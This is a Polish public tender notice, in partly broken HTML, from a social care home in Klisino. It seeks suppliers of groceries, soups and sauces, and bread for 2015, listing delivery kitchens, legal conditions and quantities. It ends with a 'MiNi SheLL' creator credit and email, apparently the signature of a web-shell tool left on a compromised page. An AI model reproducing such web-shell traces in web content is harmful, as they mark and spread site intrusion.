Kuchnie i całe zaplecza magazynowe znajdują się w Klisinie, Radyni, Boboluszkach, Dzbańcach i Bliszczyce.
Kuchnia w Boboluszkach przygotowuje również posiłki dla DPS Branice, natomiast kuchnia w Radyni przygotowuje posiłki dla mieszkańców DPS Głubczyce.
Dla filii w Kietrzu posiłki przygotowuje kuchnia w Dzbańcach.
Do tych miejsc należy dostarczać zamawiane towary własnym transportem na wyłączny koszt i ryzyko dostawcy.

Odległości od miejscowości Głubczyce:
Głubczyce - Klisino  		15 km
Głubczyce - Radynia 		15 km
Głubczyce - Boboluszki 	25 km
Głubczyce - Dzbańce 		18 km	
Głubczyce - Bliszczyce		26 km

Zamawianie towaru odbywa się dwa raz w tygodniu - telefonicznie
Godziny dostaw Wykonawca uzgodni indywidualnie z danym odbiorcą.

Dowóz pieczywa - codziennie 

Osoby które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia posiadają aktualne zaświadczenie z zakresu przestrzegania zasad higieny w procesie produkcji żywności i w obrocie żywnością wydane na podstawie Rozporządzenia Ministra Zdrowia z dnia 18 grudnia 2002 roku w sprawie kwalifikacji w zakresie przestrzegania zasad higieny w procesie produkcji lub obrocie żywności (D.U z 2003 roku Nr 27, poz. 233). 

Wykonawca zamówienia posiada przynajmniej jeden pojazd spełniający wymagania określone w Rozporządzeniu Ministra Zdrowia z dn. 19.12.2002 r. ( Dz. U. z 2003 r. Nr 21 poz. 179 ) w sprawie wymagań sanitarnych dotyczących środków transportu żywności, substancji pomagających w przetwarzaniu, dozwolonych substancji dodatkowych i innych składników żywności.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE WYMAGA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca załączy do swojej oferty podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca załączy do swojej oferty podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca załączy do swojej oferty podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca załączy do swojej oferty podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca załączy do swojej oferty podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu - załącznik nr 2</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>NIE DOTYCZY</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewidziano następujące zmiany:
- 	możliwość zmian cen w przypadku zmiany stawek podatku VAT na podstawie obowiązujących przepisów prawnych w tym zakresie. Zmiany są wprowadzone aneksem. Zmianie ulegnie kwota podatku VAT i cena brutto danego asortymentu. Cena netto pozostanie niezmienna. O zmianie VAT-u na przedmiot umowy, Wykonawca informuje pisemnie Zamawiającego z 14-dniowym wyprzedzeniem przed terminem dostawy towaru, którego cena ulegnie zmianie.
Zmiana umowy może nastąpić w przypadku gdy jej wprowadzenie jest konieczne dla prawidłowej realizacji zamówienia.
Wskazane powyżej zmiany mogą zostać wprowadzone, jedynie w przypadku jeżeli obydwie strony umowy (zamawiający i wykonawca) zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne i niezbędne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dps-klisino.pl, bip.dps.powiatglubczycki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> DOM POMOCY SPOŁECZNEJ W KLISINIE
KLISINO 100
48-118 LISIĘCICE
osobiście: codziennie od poniedziałku do piątku od godz. 7.00 do 14.00
lub za pośrednictwem poczty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2014 godzina 08:45, miejsce: DOM  POMOCY SPOŁECZNEJ W KLISINIE
KLISINO 100
48-118 LISIĘCICE
Sekretariat pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> RÓŻNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ORIENTACYJNE ZAPOTRZEBOWANIE NA 2015 ROK

Część I                  RÓŻNE ARTYKUŁY SPOŻYWCZE 
Majonez (zaw. tłuszcz. 25%)  kg	1032
Kawa zbożowa kg	746
Herbata granulowana kg	413
Cukier  kg	13603
Cukier waniliowy kg	28
Proszek do pieczenia kg	5
Kakao ciemne (niskotłuszczowe 10-12%)  kg	100
Budyń śmietankowy kg	83
Kisiel owocowy kg	219
Galaretka owocowa kg	162
Cynamon mielony kg	7
Drożdże kg	12
Mak kg	95
Miód kg	864
Żelatyna kg 	8
Czekolada nadziewana kg	334
Biszkopty kg	134
Kwasek cytrynowy kg	32
Soda oczyszczona kg	2
Ocet 10% l	331
Przyprawa Magi w płynie l	981
Sól kg	1246
Majeranek kg	14
Musztarda kg	790
Ketchup łagodny (koncentrat pomidorowy min. 35%, przyprawy: kolendra, tymianek i inne) kg	902
Ziele angielskie kg	12
Liście laurowe kg	7
Przyprawa warzywna (warzywa suszone 15%, marchew, cebula, seler pietruszka, por, papryka i inne
(Kucharek, Vegeta, Delikat lub inny nie gorszy) kg                   	788
Przyprawa do kurczaka (sól, papryka, curry, czosnek, pomidory, pieprz i inne) kg	21
Przyprawa do ryb kg	6
Przyprawa do mięsa (sól, gorczyca, czosnek, cebula, pieprz, kminek, kolendra, papryka i inne)   kg	19
Pieprz mielony kg	54
Makaron nitki  4 -jajeczny kg	4134
Makaron gruby (kolanka, muszelki, świderki) kg	1414
Makaron gruby spaghetti kg	98
Cukier puder kg	60
Rodzynki kg	16
Makaron tortellini z mięsem kg	124
Kawa naturalna - mielona kg	511
Wafle suche okrągłe szt.	164
Przyprawa czosnek granulowany kg	14
Przyprawa gyros (sól, papryka słodka, czosnek, cebula, kminek, pieprz, chilli, kolendra, tymianek i inne)  kg	10
Przyprawa do flaków kg	3
Makaron zacierka kg	264
Przyprawa - papryka mielona kg	38
Przyprawa - gałka muszkatołowa mielona kg	3
Herbata owocowa (saszetki) kg	171
Wafle kakaowe np. grześki itp. kg	569
Baton czekoladowy np. Pawełek itp. kg	67
Wiórki kokosowe kg	11
Orzechy włoskie  kg	14
Ciastka nadziewane np. Delicje kg	304
Zupa błyskawiczna tzw. chińska     kg 	37
Herbatniki kg	303
Migdały całe kg	6
Woda mineralna gazowana 1,5 l        szt.	910
Woda mineralna niegazowana 1,5 l    szt.	300
Cukierki czekoladowe kg	46
Masa krówkowa kg	17
Napój typu Kubuś	241
Makaron lasagne kg	37
Pasztet drobiowy - puszka kg	454
Konserwa wieprzowa - mielonka kg	583.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZUPY I SOSY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ORIENTACYJNE ZAPOTRZEBOWANIE NA 2015 ROK
Część II             ZUPY I SOSY
Zupa - żur  kg	64
Zupa - grzybowa kg	23
Zupa - grochowa kg	4
Zupa - barszcz biały kg	14
Zupa - ogonowa kg	58
Zupa - ogórkowa kg	16
Sos pieczeniowy kg	37
Sos pieczarkowy kg	58
Sos grzybowy kg	5
Sos boloński kg	3
Zupa - barszcz czerwony kg	31
Zupa - pieczarkowa  kg	82
Zupa - fasolowa  kg	35
Bulion drobiowo-wołowy kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ORIENTACYJNE ZAPOTRZEBOWANIE NA 2015 ROK
Część III              PIECZYWO
Chleb pszenno-żytni (krojony) kg 	52568
Baton (krojony) kg	6843
Rogal kg	141
Bułka zwykła kg	995
Bułka tarta kg	679
Chleb graham - ciemny (krojony) kg	3747
Bułka słodka kg	1 280
Bułka graham kg	414
Ciasto - pączek z marmoladą i cukrem pudrem kg 	536
Suchary kg	25
Chleb tostowy (krojony) kg	2595
Chleb graham - wieloziarnisty biały (krojony) kg	6509
Ciasto - sernik kg	96
Ciasto - jabłecznik kg	57
Ciasto - babka kg	164
Ciasto - makowiec kg	94
Ciasto - fale Dunaju kg	30
Ciasto - brzoskwiniowe kg	11
Ciasto - krówka kg	259
Ciastka kruche - luz kg	397.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com